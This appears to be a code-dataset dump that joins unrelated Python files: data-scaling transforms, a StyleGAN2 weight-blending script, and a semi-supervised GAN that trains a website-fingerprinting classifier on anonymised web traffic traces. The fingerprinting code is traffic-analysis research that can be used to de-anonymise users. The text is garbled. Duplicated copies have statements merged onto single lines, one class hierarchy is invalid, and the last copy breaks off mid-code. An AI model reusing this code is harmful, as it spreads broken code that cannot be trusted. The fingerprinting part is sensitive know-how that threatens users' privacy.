return NLPD + np.hstack((np.array([np.log(self.scalar.std_).sum()]), np.log(self.scalar.std_)))
@staticmethod
def get_transformation(Y, X):
return MeanStdYTransformation(preprocessing.StandardScaler().fit(Y))
class MinTransformation(object, DataTransformation):
"""
Transforms only Y.
transformed Y = (Y - min(Y)) / (max(Y) - min(Y)) - 0.5
"""
def __init__(self, min, max, offset):
super(MinTransformation, self).__init__()
self.min = min
self.max = max
self.offset = offset
def transform_X(self, X):
return X
def transform_Y(self, Y):
return (Y-self.min).astype('float')/(self.max-self.min) - self.offset
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return (Y+self.offset)*(self.max-self.min) + self.min
def untransform_Y_var(self, Yvar):
return Yvar * (self.max-self.min) ** 2
def untransform_NLPD(self, NLPD):
return NLPD + np.log(self.max - self.min)
@staticmethod
def get_transformation(Y, X):
return MinTransformation(Y.min(), Y.max(), 0.5)
| 21.63 | 103 | 0.596163 | import numpy as np
from sklearn import preprocessing
class DataTransformation:
def __init__(self):
pass
def transform_X(self, X):
raise NotImplementedError()
def transform_Y(self, Y):
raise NotImplementedError()
def untransform_X(self, X):
raise NotImplementedError()
def untransform_Y(self, Y):
raise NotImplementedError()
def untransform_Y_var(self, Yvar):
raise NotImplementedError()
def untransform_NLPD(self, NLPD):
raise NotImplementedError()
class IdentityTransformation:
def __init__(self):
pass
def transform_X(self, X):
return X
def transform_Y(self, Y):
return Y
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return Y
def untransform_Y_var(self, Yvar):
return Yvar
@staticmethod
def get_transformation(Y, X):
return IdentityTransformation()
def untransform_NLPD(self, NLPD):
return NLPD
class MeanTransformation(object, DataTransformation):
def __init__(self, mean):
super(MeanTransformation, self).__init__()
self.mean = mean
def transform_X(self, X):
return X
def transform_Y(self, Y):
return Y - self.mean
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return Y + self.mean
def untransform_Y_var(self, Yvar):
return Yvar
def untransform_NLPD(self, NLPD):
return NLPD
@staticmethod
def get_transformation(Y, X):
return MeanTransformation(Y.mean(axis=0))
class MeanStdYTransformation(object, DataTransformation):
def __init__(self, scalar):
super(MeanStdYTransformation, self).__init__()
self.scalar = scalar
def transform_X(self, X):
return X
def transform_Y(self, Y):
return self.scalar.transform(Y)
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return self.scalar.inverse_transform(Y)
def untransform_Y_var(self, Yvar):
return Yvar
def untransform_NLPD(self, NLPD):
return NLPD + np.hstack((np.array([np.log(self.scalar.std_).sum()]), np.log(self.scalar.std_)))
@staticmethod
def get_transformation(Y, X):
return MeanStdYTransformation(preprocessing.StandardScaler().fit(Y))
class MinTransformation(object, DataTransformation):
def __init__(self, min, max, offset):
super(MinTransformation, self).__init__()
self.min = min
self.max = max
self.offset = offset
def transform_X(self, X):
return X
def transform_Y(self, Y):
return (Y-self.min).astype('float')/(self.max-self.min) - self.offset
def untransform_X(self, X):
return X
def untransform_Y(self, Y):
return (Y+self.offset)*(self.max-self.min) + self.min
def untransform_Y_var(self, Yvar):
return Yvar * (self.max-self.min) ** 2
def untransform_NLPD(self, NLPD):
return NLPD + np.log(self.max - self.min)
@staticmethod
def get_transformation(Y, X):
return MinTransformation(Y.min(), Y.max(), 0.5)
| true | true |
7900e540ea8e51a95ef1f2f7243500e88e57633b | 2,518 | py | Python | blend.py | jscarlson/stylegan2-pytorch | b460a7378ff3e80ff56190b3225c65e42e37ad6e | [
"MIT",
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | blend.py | jscarlson/stylegan2-pytorch | b460a7378ff3e80ff56190b3225c65e42e37ad6e | [
"MIT",
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | blend.py | jscarlson/stylegan2-pytorch | b460a7378ff3e80ff56190b3225c65e42e37ad6e | [
"MIT",
"BSD-2-Clause",
"Apache-2.0"
] | null | null | null | import os
import copy
import numpy as np
import click
from typing import List, Optional
import torch
import pickle
def extract_conv_names(model):
model_names = list(name for name in model.keys())
return model_names
def blend_models(low, high, model_res, level):
levels = [x for x in range(level)]
low_names = extract_conv_names(low)
high_names = extract_conv_names(high)
assert all((x == y for x, y in zip(low_names, high_names)))
#start with lower model and add weights above
model_out = copy.deepcopy(low)
for name in high.keys():
if any(f'convs.{lvl}' in name for lvl in levels):
continue
if any(f'to_rgbs.{lvl // 2}' in name for lvl in levels):
continue
if any(f'noises.noise_{lvl}' in name for lvl in levels):
continue
if ('style' in name):
continue
if ('conv1' in name):
continue
if ('to_rgb1' in name):
continue
if ('input.input' in name):
continue
# print(name)
model_out[name] = high[name].clone()
return model_out
#----------------------------------------------------------------------------
@click.command()
@click.pass_context
@click.option('--lower_res_pkl', help='Network pickle filename for lower resolutions', required=True)
@click.option('--higher_res_pkl', help='Network pickle filename for higher resolutions', required=True)
@click.option('--output_path','out', help='Network pickle filepath for output', default='./blended.pt')
@click.option('--model_res', type=int, help='Output resolution of model (likely 1024, 512, or 256)', default=64, show_default=True)
@click.option('--split_lvl', type=int, help='Resolution to split model weights', default=4, show_default=True)
def create_blended_model(
ctx: click.Context,
lower_res_pkl: str,
higher_res_pkl: str,
model_res: Optional[int],
split_lvl: Optional[int],
out: Optional[str],
):
lo_G_ema = torch.load(lower_res_pkl, map_location=torch.device('cpu'))['g_ema']
hi = torch.load(higher_res_pkl, map_location=torch.device('cpu'))['g_ema']
model_out = blend_models(lo_G_ema, hi, model_res, split_lvl)
torch.save(model_out, out)
#----------------------------------------------------------------------------
if __name__ == "__main__":
create_blended_model() # pylint: disable=no-value-for-parameter
#---------------------------------------------------------------------------- | 32.701299 | 131 | 0.603654 | import os
import copy
import numpy as np
import click
from typing import List, Optional
import torch
import pickle
def extract_conv_names(model):
model_names = list(name for name in model.keys())
return model_names
def blend_models(low, high, model_res, level):
levels = [x for x in range(level)]
low_names = extract_conv_names(low)
high_names = extract_conv_names(high)
assert all((x == y for x, y in zip(low_names, high_names)))
model_out = copy.deepcopy(low)
for name in high.keys():
if any(f'convs.{lvl}' in name for lvl in levels):
continue
if any(f'to_rgbs.{lvl // 2}' in name for lvl in levels):
continue
if any(f'noises.noise_{lvl}' in name for lvl in levels):
continue
if ('style' in name):
continue
if ('conv1' in name):
continue
if ('to_rgb1' in name):
continue
if ('input.input' in name):
continue
model_out[name] = high[name].clone()
return model_out
@click.command()
@click.pass_context
@click.option('--lower_res_pkl', help='Network pickle filename for lower resolutions', required=True)
@click.option('--higher_res_pkl', help='Network pickle filename for higher resolutions', required=True)
@click.option('--output_path','out', help='Network pickle filepath for output', default='./blended.pt')
@click.option('--model_res', type=int, help='Output resolution of model (likely 1024, 512, or 256)', default=64, show_default=True)
@click.option('--split_lvl', type=int, help='Resolution to split model weights', default=4, show_default=True)
def create_blended_model(
ctx: click.Context,
lower_res_pkl: str,
higher_res_pkl: str,
model_res: Optional[int],
split_lvl: Optional[int],
out: Optional[str],
):
lo_G_ema = torch.load(lower_res_pkl, map_location=torch.device('cpu'))['g_ema']
hi = torch.load(higher_res_pkl, map_location=torch.device('cpu'))['g_ema']
model_out = blend_models(lo_G_ema, hi, model_res, split_lvl)
torch.save(model_out, out)
if __name__ == "__main__":
create_blended_model()
| true | true |
7900e5869d879e772ede2db438ad55df82aa36fa | 17,454 | py | Python | wfi/cw/wfi-cw5.py | traffic-analysis/gandalf | 7015cdde2765fadd0cb653adea1e2b5dc2a6145e | [
"MIT"
] | 2 | 2021-09-29T05:06:46.000Z | 2021-12-12T19:48:18.000Z | wfi/cw/wfi-cw5.py | traffic-analysis/gandalf | 7015cdde2765fadd0cb653adea1e2b5dc2a6145e | [
"MIT"
] | null | null | null | wfi/cw/wfi-cw5.py | traffic-analysis/gandalf | 7015cdde2765fadd0cb653adea1e2b5dc2a6145e | [
"MIT"
] | null | null | null | import tensorflow as tf
import tensorflow.contrib.distributions as tfd
import numpy as np
import os.path as opth
import tqdm
import os
from sklearn.utils import shuffle
import argparse
HOME = os.path.expanduser('~')
os.environ["CUDA_VISIBLE_DEVICES"] = "2";
layers = tf.keras.layers
parser = argparse.ArgumentParser()
def define_generator():
def conv1d_block(filters, upsample=True, activation=tf.nn.relu, index=0):
if upsample:
model.add(layers.UpSampling1D(name="UpSampling" + str(index), size=2))
model.add(layers.Conv1D(filters=filters, kernel_size=5, padding='same', name="Conv1D" + str(index),
activation=activation))
model.add(layers.BatchNormalization())
model = tf.keras.models.Sequential(name="Generator")
model.add(layers.Dense(int(316), activation=tf.nn.relu, name="NoiseToSpatial")) #50
model.add(layers.BatchNormalization())
model.add(layers.Reshape((int(316),1)))
conv1d_block(filters=512, upsample=True, index=0)
conv1d_block(filters=512, upsample=True, index=1)
conv1d_block(filters=256, upsample=True, index=2)
conv1d_block(filters=256, upsample=True, index=3)
conv1d_block(filters=128, upsample=False, index=4)
conv1d_block(filters=128, upsample=False, index=5)
conv1d_block(filters=64, upsample=False, index=6)
conv1d_block(filters=64, upsample=False, index=7)
conv1d_block(filters=1, upsample=False, activation=tf.nn.tanh, index=8)
return model
class Discriminator:
def __init__(self):
self.tail = self._define_tail()
self.head = self._define_head()
def _define_tail(self, name="Discriminator"):
feature_model = tf.keras.models.Sequential(name=name)
def conv1d_dropout(filters, strides, index=0):
suffix = str(index)
feature_model.add(layers.Conv1D(filters=filters, strides=strides, name="Conv{}".format(suffix), padding='same',
kernel_size=5, activation=tf.nn.leaky_relu))
feature_model.add(layers.Dropout(name="Dropout{}".format(suffix), rate=0.3))
conv1d_dropout(filters=32, strides=2, index=5)
conv1d_dropout(filters=32, strides=2, index=6)
conv1d_dropout(filters=64, strides=2, index=0)
conv1d_dropout(filters=64, strides=2, index=1)
conv1d_dropout(filters=128, strides=2, index=2)
conv1d_dropout(filters=128, strides=2, index=3)
conv1d_dropout(filters=256, strides=1, index=4) #64
conv1d_dropout(filters=256, strides=1, index=7)
feature_model.add(layers.Flatten(name="Flatten")) # This is feature layer for FM loss !!
return feature_model
def _define_head(self):
head_model = tf.keras.models.Sequential(name="DiscriminatorHead")
head_model.add(layers.Dense(units=2048, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=2048, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=1024, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=512, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=args.num_classes, activation=None, name="Logits"))
return head_model
@property
def trainable_variables(self):
return self.tail.trainable_variables + self.head.trainable_variables
def __call__(self, x, *args, **kwargs):
features = self.tail(x, *args, **kwargs)
print(features.shape)
return self.head(features, *args, **kwargs), features
def accuracy(logits, labels):
preds = tf.argmax(logits, axis=1)
return tf.reduce_mean(tf.to_float(tf.equal(preds, labels)))
def main(args):
global best_acc
best_acc = 0
with tf.Graph().as_default():
print("Input data preprocessing...")
with tf.name_scope("DataPreprocess"):
r_train = 500.0 / 6.0
r_test = 100.0 / 6.0
nClass = 100 # 95 # 100
mon_instance = 2498.0 # 1000.0 # 300.0
unClass = 0 # 40000 # 30000
unmon_instance = unClass
dim = 5000
with tf.device('/cpu:0'):
(train_x, train_y, test_x_data, test_y_data) = split_awf_closed(r_train, r_test, nClass, mon_instance,
unmon_instance, dim)
def reshape_and_scale(x, img_shape=(-1, dim, 1)):
return x.reshape(img_shape).astype(np.float32)
train_x = reshape_and_scale(train_x)
test_x_data = reshape_and_scale(test_x_data)
# Use AWF2 for unlabled set
awf_data2 = np.load (HOME+'/datasets/awf2.npz', allow_pickle=True)
train_x_unlabeled = awf_data2['data']
train_y_unlabeled = awf_data2['labels']
train_x_unlabeled = reshape_and_scale(train_x_unlabeled)
X, y = shuffle(train_x, train_y)
print(X.shape)
print(y.shape)
print("Setup the input pipeline...")
with tf.name_scope("InputPipeline"):
train_x_labeled, train_y_labeled = [], []
for i in range(args.num_classes):
print(i)
train_x_labeled.append(X[y == i][:args.num_labeled_examples])
train_y_labeled.append(y[y == i][:args.num_labeled_examples])
train_x_labeled_data = np.concatenate(train_x_labeled)
train_y_labeled_data = np.concatenate(train_y_labeled)
train_x_unlabeled_data = train_x_unlabeled#np.concatenate(train_x_unlabeled)
train_y_unlabeled_data = train_y_unlabeled#np.concatenate(train_y_unlabeled)
train_x_unlabeled2, train_y_unlabeled2 = shuffle(train_x_unlabeled, train_y_unlabeled)
train_x_unlabeled2_data = train_x_unlabeled2#np.concatenate(train_x_unlabeled2)
train_y_unlabeled2_data = train_y_unlabeled2#np.concatenate(train_y_unlabeled2)
labeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
labeled_y = tf.placeholder(tf.int64, shape=[None])
unlabeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
unlabeled_y = tf.placeholder(tf.int64, shape=[None])
unlabeled_X2 = tf.placeholder(tf.float32, shape=[None, dim, 1])
unlabeled_y2 = tf.placeholder(tf.int64, shape=[None])
test_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
test_y = tf.placeholder(tf.int64, shape=[None])
train_labeled_dataset = tf.data.Dataset.from_tensor_slices((labeled_X, labeled_y)) \
.shuffle(buffer_size=len(train_x_labeled_data)) \
.repeat()
train_labeled_dataset = train_labeled_dataset.batch(args.batch_size)
iterator_labeled = train_labeled_dataset.make_initializable_iterator()
traces_lab, labels_lab = iterator_labeled.get_next()
train_unlabeled_dataset = tf.data.Dataset.from_tensor_slices(
(unlabeled_X, unlabeled_y, unlabeled_X2, unlabeled_y2)) \
.shuffle(buffer_size=len(train_x_labeled_data)) \
.repeat()
train_unlabeled_dataset = train_unlabeled_dataset.batch(args.batch_size)
iterator_unlabeled = train_unlabeled_dataset.make_initializable_iterator()
traces_unl, labels_unl, traces_unl2, labels_unl2 = iterator_unlabeled.get_next()
test_dataset = tf.data.Dataset.from_tensor_slices((test_X, test_y)) \
.repeat()
test_dataset = test_dataset.batch(args.batch_size)
iterator_test = test_dataset.make_initializable_iterator()
traces_test, labels_test = iterator_test.get_next()
with tf.name_scope("BatchSize"):
batch_size_tensor = tf.shape(traces_lab)[0]
z, z_perturbed = define_noise(batch_size_tensor,args)
with tf.name_scope("Generator"):
g_model = define_generator()
traces_fake = g_model(z)
traces_fake_perturbed = g_model(z_perturbed)
with tf.name_scope("Discriminator") as discriminator_scope:
d_model = Discriminator()
logits_fake, features_fake = d_model(traces_fake, training=True)
logits_fake_perturbed, _ = d_model(traces_fake_perturbed, training=True)
logits_real_unl, features_real_unl = d_model(traces_unl, training=True)
logits_real_lab, features_real_lab = d_model(traces_lab, training=True) # 1) For supervised loss
logits_train, _ = d_model(traces_lab, training=False)
with tf.name_scope("DiscriminatorLoss"):
loss_supervised = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels_lab, logits=logits_real_lab))
logits_sum_real = tf.reduce_logsumexp(logits_real_unl, axis=1)
logits_sum_fake = tf.reduce_logsumexp(logits_fake, axis=1)
loss_unsupervised = 0.5 * (
tf.negative(tf.reduce_mean(logits_sum_real)) +
tf.reduce_mean(tf.nn.softplus(logits_sum_real)) +
tf.reduce_mean(tf.nn.softplus(logits_sum_fake)))
loss_d = loss_supervised + loss_unsupervised
if args.man_reg:
loss_d += 1e-3 * tf.nn.l2_loss(logits_fake - logits_fake_perturbed) \
/ tf.to_float(batch_size_tensor)
with tf.name_scope("Train") as train_scope:
optimizer = tf.train.AdamOptimizer(args.lr * 0.25)
optimize_d = optimizer.minimize(loss_d, var_list=d_model.trainable_variables)
train_accuracy_op = accuracy(logits_train, labels_lab)
with tf.name_scope(discriminator_scope):
with tf.control_dependencies([optimize_d]):
logits_fake, features_fake = d_model(traces_fake, training=True)
logits_real_unl, features_real_unl = d_model(traces_unl2, training=True)
with tf.name_scope("GeneratorLoss"):
feature_mean_real = tf.reduce_mean(features_real_unl, axis=0)
feature_mean_fake = tf.reduce_mean(features_fake, axis=0)
# L1 distance of features is the loss for the generator
loss_g = tf.reduce_mean(tf.abs(feature_mean_real - feature_mean_fake))
with tf.name_scope(train_scope):
optimizer = tf.train.AdamOptimizer(args.lr, beta1=0.5)
train_op = optimizer.minimize(loss_g, var_list=g_model.trainable_variables)
with tf.name_scope(discriminator_scope):
with tf.name_scope("Test"):
logits_test, _ = d_model(traces_test, training=False)
test_accuracy_op = accuracy(logits_test, labels_test)
with tf.name_scope("Summaries"):
summary_op = tf.summary.merge([
tf.summary.scalar("LossDiscriminator", loss_d),
tf.summary.scalar("LossGenerator", loss_g),
tf.summary.scalar("ClassificationAccuracyTrain", train_accuracy_op),
tf.summary.scalar("ClassificationAccuracyTest", test_accuracy_op)])
writer = tf.summary.FileWriter(_next_logdir("tensorboard/wfi5_cw"))
print("Run training...")
steps_per_epoch = (len(train_x_labeled_data) + len(
train_x_unlabeled_data)) // args.batch_size
steps_per_test = test_x_data.shape[0] // args.batch_size
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
step = 0
for epoch in range(args.train_epochs):
losses_d, losses_g, accuracies = [], [], []
print("Epoch {}".format(epoch))
pbar = tqdm.trange(steps_per_epoch)
sess.run(iterator_labeled.initializer,
feed_dict={labeled_X: train_x_labeled_data, labeled_y: train_y_labeled_data})
sess.run(iterator_unlabeled.initializer,
feed_dict={unlabeled_X: train_x_unlabeled_data, unlabeled_y: train_y_unlabeled_data,
unlabeled_X2: train_x_unlabeled2_data, unlabeled_y2: train_y_unlabeled2_data})
sess.run(iterator_test.initializer, feed_dict={test_X: test_x_data, test_y: test_y_data})
for _ in pbar:
if step % 1000 == 0:
_, loss_g_batch, loss_d_batch, summ, accuracy_batch = sess.run(
[train_op, loss_g, loss_d, summary_op, train_accuracy_op])
writer.add_summary(summ, global_step=step)
else:
_, loss_g_batch, loss_d_batch, accuracy_batch = sess.run(
[train_op, loss_g, loss_d, train_accuracy_op])
pbar.set_description("Discriminator loss {0:.3f}, Generator loss {1:.3f}"
.format(loss_d_batch, loss_g_batch))
losses_d.append(loss_d_batch)
losses_g.append(loss_g_batch)
accuracies.append(accuracy_batch)
step += 1
print("Discriminator loss: {0:.4f}, Generator loss: {1:.4f}, "
"Train accuracy: {2:.4f}"
.format(np.mean(losses_d), np.mean(losses_g), np.mean(accuracies)))
accuracies = [sess.run(test_accuracy_op) for _ in range(steps_per_test)]
if np.mean (accuracies) > best_acc:
best_acc = np.mean (accuracies)
if epoch == (int(args.train_epochs)-1):
print ("Test accuracy: {0:.4f}".format (np.mean (accuracies)))
print ("Best accuracy: {0:.4f}".format (best_acc))
def define_noise(batch_size_tensor, args):
with tf.name_scope("LatentNoiseVector"):
z = tfd.Normal(loc=0.0, scale=args.stddev).sample(
sample_shape=(batch_size_tensor, args.z_dim_size))
z_perturbed = z + tfd.Normal(loc=0.0, scale=args.stddev).sample(
sample_shape=(batch_size_tensor, args.z_dim_size)) * 1e-5
return z, z_perturbed
def split_awf_closed(r_train, r_test, nClass, mon_instance, unmon_instance, dim):
mon_data = np.load(HOME+'/datasets/awf1.npz', allow_pickle=True)
mon_x = mon_data['feature']
## We need to uniformly random selection over each monitored class
print('mon_instance',mon_instance)
print('unmon_instance',unmon_instance)
num_mtrain_instance = mon_instance * (r_train / (r_train + r_test)) ## number of monitored training instances for each class
mon_random = np.array(range(int(mon_instance)))
np.random.shuffle(mon_random)
mon_train_ins = mon_random[:int(num_mtrain_instance)] #1666
mon_test_ins = mon_random[int(num_mtrain_instance):]
print('mon_test_ins', len(mon_test_ins))
# Due to the memory error, initialize np arrays here first
train_feature = np.zeros((nClass*len(mon_train_ins), dim), dtype=int)
test_feature = np.zeros((nClass*len(mon_test_ins),dim), dtype=int)
print('test_feature', len(test_feature))
train_label = np.zeros((nClass*len(mon_train_ins),), dtype=int)
test_label = np.zeros((nClass*len(mon_test_ins),), dtype=int)
print(len(mon_train_ins))
print(len(mon_test_ins))
i = 0
mon_instance = int(mon_instance)
print('Monitored training set partitioning...')
print(nClass)
print(len(mon_train_ins))
for c in range(nClass):
c=int(c)
print(c)
for instance in mon_train_ins:
train_label[i] = c
train_feature[i] = mon_x[(c*mon_instance)+instance][:dim]
i += 1
print(i)
print('Monitored testing set partitioning...')
j = 0
for c in range(nClass):
c = int(c)
for instance in mon_test_ins:
test_label[j]=c
test_feature[j]=mon_x[(c*mon_instance)+instance][:dim]
j += 1
print(j)
print(j)
print('train_feature: ', len(train_feature))
print('train_label: ', len(train_label))
print('test_feature: ', len(test_feature))
print('test_label: ', len(test_label))
print('train_dim: ', len(train_feature[0]))
print('test_dim: ', len(test_feature[0]))
return train_feature, train_label, test_feature, test_label
def _next_logdir(path):
if not os.path.exists(path):
os.makedirs(path)
subdirs = [d for d in os.listdir(path) if opth.isdir(opth.join(path, d))]
logdir = opth.join(path, "run" + str(len(subdirs)).zfill(4))
if not os.path.exists(logdir):
os.makedirs(logdir)
return logdir
if __name__ == "__main__":
parser.add_argument ('--batch_size', required=False, default=32)
parser.add_argument ('--train_epochs', required=False, default=12)
parser.add_argument ('--lr', required=False, default=2e-4)
parser.add_argument ('--stddev', required=False, default=1e-2)
parser.add_argument ('--num_classes', required=False, default=100)
parser.add_argument ('--z_dim_size', required=False, default=100)
parser.add_argument ('--num_labeled_examples', required=False, default=5)
parser.add_argument ('--man_reg', required=False, default=True)
args = parser.parse_args ()
for i in range(5):
main(args)
| 44.868895 | 129 | 0.641744 | import tensorflow as tf
import tensorflow.contrib.distributions as tfd
import numpy as np
import os.path as opth
import tqdm
import os
from sklearn.utils import shuffle
import argparse
HOME = os.path.expanduser('~')
os.environ["CUDA_VISIBLE_DEVICES"] = "2";
layers = tf.keras.layers
parser = argparse.ArgumentParser()
def define_generator():
def conv1d_block(filters, upsample=True, activation=tf.nn.relu, index=0):
if upsample:
model.add(layers.UpSampling1D(name="UpSampling" + str(index), size=2))
model.add(layers.Conv1D(filters=filters, kernel_size=5, padding='same', name="Conv1D" + str(index),
activation=activation))
model.add(layers.BatchNormalization())
model = tf.keras.models.Sequential(name="Generator")
model.add(layers.Dense(int(316), activation=tf.nn.relu, name="NoiseToSpatial"))
model.add(layers.BatchNormalization())
model.add(layers.Reshape((int(316),1)))
conv1d_block(filters=512, upsample=True, index=0)
conv1d_block(filters=512, upsample=True, index=1)
conv1d_block(filters=256, upsample=True, index=2)
conv1d_block(filters=256, upsample=True, index=3)
conv1d_block(filters=128, upsample=False, index=4)
conv1d_block(filters=128, upsample=False, index=5)
conv1d_block(filters=64, upsample=False, index=6)
conv1d_block(filters=64, upsample=False, index=7)
conv1d_block(filters=1, upsample=False, activation=tf.nn.tanh, index=8)
return model
class Discriminator:
def __init__(self):
self.tail = self._define_tail()
self.head = self._define_head()
def _define_tail(self, name="Discriminator"):
feature_model = tf.keras.models.Sequential(name=name)
def conv1d_dropout(filters, strides, index=0):
suffix = str(index)
feature_model.add(layers.Conv1D(filters=filters, strides=strides, name="Conv{}".format(suffix), padding='same',
kernel_size=5, activation=tf.nn.leaky_relu))
feature_model.add(layers.Dropout(name="Dropout{}".format(suffix), rate=0.3))
conv1d_dropout(filters=32, strides=2, index=5)
conv1d_dropout(filters=32, strides=2, index=6)
conv1d_dropout(filters=64, strides=2, index=0)
conv1d_dropout(filters=64, strides=2, index=1)
conv1d_dropout(filters=128, strides=2, index=2)
conv1d_dropout(filters=128, strides=2, index=3)
conv1d_dropout(filters=256, strides=1, index=4)
conv1d_dropout(filters=256, strides=1, index=7)
feature_model.add(layers.Flatten(name="Flatten"))
return feature_model
def _define_head(self):
head_model = tf.keras.models.Sequential(name="DiscriminatorHead")
head_model.add(layers.Dense(units=2048, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=2048, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=1024, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=512, activation='relu'))
head_model.add(layers.Dropout(rate=0.5))
head_model.add(layers.Dense(units=args.num_classes, activation=None, name="Logits"))
return head_model
@property
def trainable_variables(self):
return self.tail.trainable_variables + self.head.trainable_variables
def __call__(self, x, *args, **kwargs):
features = self.tail(x, *args, **kwargs)
print(features.shape)
return self.head(features, *args, **kwargs), features
def accuracy(logits, labels):
preds = tf.argmax(logits, axis=1)
return tf.reduce_mean(tf.to_float(tf.equal(preds, labels)))
def main(args):
global best_acc
best_acc = 0
with tf.Graph().as_default():
print("Input data preprocessing...")
with tf.name_scope("DataPreprocess"):
r_train = 500.0 / 6.0
r_test = 100.0 / 6.0
nClass = 100 mon_instance = 2498.0 unClass = 0 unmon_instance = unClass
dim = 5000
with tf.device('/cpu:0'):
(train_x, train_y, test_x_data, test_y_data) = split_awf_closed(r_train, r_test, nClass, mon_instance,
unmon_instance, dim)
def reshape_and_scale(x, img_shape=(-1, dim, 1)):
return x.reshape(img_shape).astype(np.float32)
train_x = reshape_and_scale(train_x)
test_x_data = reshape_and_scale(test_x_data)
awf_data2 = np.load (HOME+'/datasets/awf2.npz', allow_pickle=True)
train_x_unlabeled = awf_data2['data']
train_y_unlabeled = awf_data2['labels']
train_x_unlabeled = reshape_and_scale(train_x_unlabeled)
X, y = shuffle(train_x, train_y)
print(X.shape)
print(y.shape)
print("Setup the input pipeline...")
with tf.name_scope("InputPipeline"):
train_x_labeled, train_y_labeled = [], []
for i in range(args.num_classes):
print(i)
train_x_labeled.append(X[y == i][:args.num_labeled_examples])
train_y_labeled.append(y[y == i][:args.num_labeled_examples])
train_x_labeled_data = np.concatenate(train_x_labeled)
train_y_labeled_data = np.concatenate(train_y_labeled)
train_x_unlabeled_data = train_x_unlabeled
train_y_unlabeled_data = train_y_unlabeled
train_x_unlabeled2, train_y_unlabeled2 = shuffle(train_x_unlabeled, train_y_unlabeled)
train_x_unlabeled2_data = train_x_unlabeled2
train_y_unlabeled2_data = train_y_unlabeled2
labeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
labeled_y = tf.placeholder(tf.int64, shape=[None])
unlabeled_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
unlabeled_y = tf.placeholder(tf.int64, shape=[None])
unlabeled_X2 = tf.placeholder(tf.float32, shape=[None, dim, 1])
unlabeled_y2 = tf.placeholder(tf.int64, shape=[None])
test_X = tf.placeholder(tf.float32, shape=[None, dim, 1])
test_y = tf.placeholder(tf.int64, shape=[None])
train_labeled_dataset = tf.data.Dataset.from_tensor_slices((labeled_X, labeled_y)) \
.shuffle(buffer_size=len(train_x_labeled_data)) \
.repeat()
train_labeled_dataset = train_labeled_dataset.batch(args.batch_size)
iterator_labeled = train_labeled_dataset.make_initializable_iterator()
traces_lab, labels_lab = iterator_labeled.get_next()
train_unlabeled_dataset = tf.data.Dataset.from_tensor_slices(
(unlabeled_X, unlabeled_y, unlabeled_X2, unlabeled_y2)) \
.shuffle(buffer_size=len(train_x_labeled_data)) \
.repeat()
train_unlabeled_dataset = train_unlabeled_dataset.batch(args.batch_size)
iterator_unlabeled = train_unlabeled_dataset.make_initializable_iterator()
traces_unl, labels_unl, traces_unl2, labels_unl2 = iterator_unlabeled.get_next()
test_dataset = tf.data.Dataset.from_tensor_slices((test_X, test_y)) \
.repeat()
test_dataset = test_dataset.batch(args.batch_size)
iterator_test = test_dataset.make_initializable_iterator()
traces_test, labels_test = iterator_test.get_next()
with tf.name_scope("BatchSize"):
batch_size_tensor = tf.shape(traces_lab)[0]
z, z_perturbed = define_noise(batch_size_tensor,args)
with tf.name_scope("Generator"):
g_model = define_generator()
traces_fake = g_model(z)
traces_fake_perturbed = g_model(z_perturbed)
with tf.name_scope("Discriminator") as discriminator_scope:
d_model = Discriminator()
logits_fake, features_fake = d_model(traces_fake, training=True)
logits_fake_perturbed, _ = d_model(traces_fake_perturbed, training=True)
logits_real_unl, features_real_unl = d_model(traces_unl, training=True)
logits_real_lab, features_real_lab = d_model(traces_lab, training=True)
logits_train, _ = d_model(traces_lab, training=False)
with tf.name_scope("DiscriminatorLoss"):
loss_supervised = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels_lab, logits=logits_real_lab))
logits_sum_real = tf.reduce_logsumexp(logits_real_unl, axis=1)
logits_sum_fake = tf.reduce_logsumexp(logits_fake, axis=1)
loss_unsupervised = 0.5 * (
tf.negative(tf.reduce_mean(logits_sum_real)) +
tf.reduce_mean(tf.nn.softplus(logits_sum_real)) +
tf.reduce_mean(tf.nn.softplus(logits_sum_fake)))
loss_d = loss_supervised + loss_unsupervised
if args.man_reg:
loss_d += 1e-3 * tf.nn.l2_loss(logits_fake - logits_fake_perturbed) \
/ tf.to_float(batch_size_tensor)
with tf.name_scope("Train") as train_scope:
optimizer = tf.train.AdamOptimizer(args.lr * 0.25)
optimize_d = optimizer.minimize(loss_d, var_list=d_model.trainable_variables)
train_accuracy_op = accuracy(logits_train, labels_lab)
with tf.name_scope(discriminator_scope):
with tf.control_dependencies([optimize_d]):
logits_fake, features_fake = d_model(traces_fake, training=True)
logits_real_unl, features_real_unl = d_model(traces_unl2, training=True)
with tf.name_scope("GeneratorLoss"):
feature_mean_real = tf.reduce_mean(features_real_unl, axis=0)
feature_mean_fake = tf.reduce_mean(features_fake, axis=0)
loss_g = tf.reduce_mean(tf.abs(feature_mean_real - feature_mean_fake))
with tf.name_scope(train_scope):
optimizer = tf.train.AdamOptimizer(args.lr, beta1=0.5)
train_op = optimizer.minimize(loss_g, var_list=g_model.trainable_variables)
with tf.name_scope(discriminator_scope):
with tf.name_scope("Test"):
logits_test, _ = d_model(traces_test, training=False)
test_accuracy_op = accuracy(logits_test, labels_test)
with tf.name_scope("Summaries"):
summary_op = tf.summary.merge([
tf.summary.scalar("LossDiscriminator", loss_d),
tf.summary.scalar("LossGenerator", loss_g),
